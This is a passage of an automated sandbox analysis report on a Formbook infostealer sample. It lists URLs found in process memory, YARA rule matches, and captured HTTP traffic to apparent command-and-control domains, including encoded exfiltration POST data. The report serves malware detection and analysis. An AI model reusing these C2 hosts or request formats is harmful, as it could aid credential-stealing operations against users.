Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591A
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Press
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngZ
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/gws_rd=ssl
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/LMEMx
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/S
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchW
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF
Source: unknown HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).
Source: unknown DNS traffic detected: queries for: www.dems-clicks.com
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: iuvRyl9i7D.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
